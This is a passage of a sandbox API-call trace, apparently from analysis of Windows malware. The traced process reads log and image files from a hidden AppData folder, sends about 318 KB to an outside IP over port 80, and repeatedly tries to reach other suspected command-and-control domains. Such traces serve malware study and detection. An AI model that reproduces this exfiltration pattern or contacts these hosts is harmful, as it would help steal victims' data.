DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.596] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.596] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.596] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.596] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1344, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0247.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.597] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.597] NtQueryInformationFile (in: FileHandle=0x1344, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0247.597] NtReadFile (in: FileHandle=0x1344, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0247.597] NtClose (Handle=0x1344) returned 0x0 [0247.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.597] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.597] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.597] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.597] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.598] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0x1344, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0247.598] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0247.598] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.598] NtQueryInformationFile (in: FileHandle=0x1344, IoStatusBlock=0x26ef610, FileInformation=0x26ef620, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef610, FileInformation=0x26ef620) returned 0x0 [0247.598] NtReadFile (in: FileHandle=0x1344, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef610, Buffer=0x8fb984d, BufferLength=0x2ba28, ByteOffset=0x26ef608*=0, Key=0x0 | out: IoStatusBlock=0x26ef610, Buffer=0x8fb984d*) returned 0x0 [0247.598] NtClose (Handle=0x1344) returned 0x0 [0247.598] socket (af=2, type=1, protocol=6) returned 0x1344 [0247.599] connect (s=0x1344, name=0x3f36380*(sa_family=2, sin_port=0x50, sin_addr="3.13.103.114"), namelen=16) returned 0 [0247.715] RtlIntegerToChar (in: Value=0x4d970, Base=0x0, Length=0x8, String=0x26ef668 | out: String="317808") returned 0x0 [0247.718] send (s=0x1344, buf=0x9039840*, len=318310, flags=0) returned 318310 [0247.719] closesocket (s=0x1344) returned 0 [0247.719] socket (af=2, type=1, protocol=6) returned 0x1344 [0247.720] getaddrinfo (in: pNodeName="www.investotbank.com", pServiceName="80", pHints=0x6f0bef8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0bf28 | out: ppResult=0x6f0bf28*=0x0) returned 11001 [0247.721] Sleep (dwMilliseconds=0x7d0) [0247.731] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.731] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.732] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0247.732] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.732] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.732] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1404, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0247.732] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.732] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.732] NtQueryInformationFile (in: FileHandle=0x1404, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0247.732] NtReadFile (in: FileHandle=0x1404, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0247.732] NtClose (Handle=0x1404) returned 0x0 [0247.732] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.732] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.733] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.733] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.733] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.733] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.733] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.733] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.733] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.733] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.733] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.733] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.733] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.733] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1404, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0247.733] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.733] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.733] NtQueryInformationFile (in: FileHandle=0x1404, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0247.733] NtReadFile (in: FileHandle=0x1404, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x6ea, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0247.733] NtClose (Handle=0x1404) returned 0x0 [0247.734] getaddrinfo (in: pNodeName="www.investotbank.com", pServiceName="80", pHints=0x6f0bef8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0bf28 | out: ppResult=0x6f0bf28*=0x0) returned 11001 [0247.734] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.734] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.734] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.734] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.734] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.734] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1404, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0247.735] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.735] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.735] NtQueryInformationFile (in: FileHandle=0x1404, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0247.735] NtReadFile (in: FileHandle=0x1404, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0247.735] NtClose (Handle=0x1404) returned 0x0 [0247.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.735] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.735] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.735] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.735] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.735] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.735] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.735] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0x1404, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0247.735] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0247.736] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.736] NtQueryInformationFile (in: FileHandle=0x1404, IoStatusBlock=0x26ef610, FileInformation=0x26ef620, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef610, FileInformation=0x26ef620) returned 0x0 [0247.736] NtReadFile (in: FileHandle=0x1404, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef610, Buffer=0x8fb984d, BufferLength=0x2ba28, ByteOffset=0x26ef608*=0, Key=0x0 | out: IoStatusBlock=0x26ef610, Buffer=0x8fb984d*) returned 0x0 [0247.736] NtClose (Handle=0x1404) returned 0x0 [0247.736] getaddrinfo (in: pNodeName="www.investotbank.com", pServiceName="80", pHints=0x6f0bef8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0bf28 | out: ppResult=0x6f0bf28*=0x0) returned 11001 [0247.737] Sleep (dwMilliseconds=0x7d0) [0247.747] Sleep (dwMilliseconds=0x7d0) [0247.792] Sleep (dwMilliseconds=0x7d0) [0247.794] Sleep (dwMilliseconds=0x7d0) [0247.809] Sleep (dwMilliseconds=0x7d0) [0247.825] Sleep (dwMilliseconds=0x7d0) [0247.840] Sleep (dwMilliseconds=0x7d0) [0247.856] Sleep (dwMilliseconds=0x7d0) [0247.872] Sleep (dwMilliseconds=0x7d0) [0247.887] Sleep (dwMilliseconds=0x7d0) [0247.903] Sleep (dwMilliseconds=0x7d0) [0247.919] Sleep (dwMilliseconds=0x7d0) [0247.935] Sleep (dwMilliseconds=0x7d0) [0247.950] Sleep (dwMilliseconds=0x7d0) [0247.965] Sleep (dwMilliseconds=0x7d0) [0247.981] Sleep (dwMilliseconds=0x7d0) [0247.996] Sleep (dwMilliseconds=0x7d0) [0248.012] Sleep (dwMilliseconds=0x7d0) [0248.028] Sleep (dwMilliseconds=0x7d0) [0248.044] Sleep (dwMilliseconds=0x7d0) [0248.061] Sleep (dwMilliseconds=0x7d0) [0248.075] Sleep (dwMilliseconds=0x7d0) [0248.090] socket (af=2, type=1, protocol=6) returned 0x1404 [0248.090] getaddrinfo (in: pNodeName="www.theheavymental.com", pServiceName="80", pHints=0x6f0c298*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c2c8 | out: ppResult=0x6f0c2c8*=0x0) returned 11001 [0249.036] Sleep (dwMilliseconds=0x7d0) [0249.043] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.043] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, 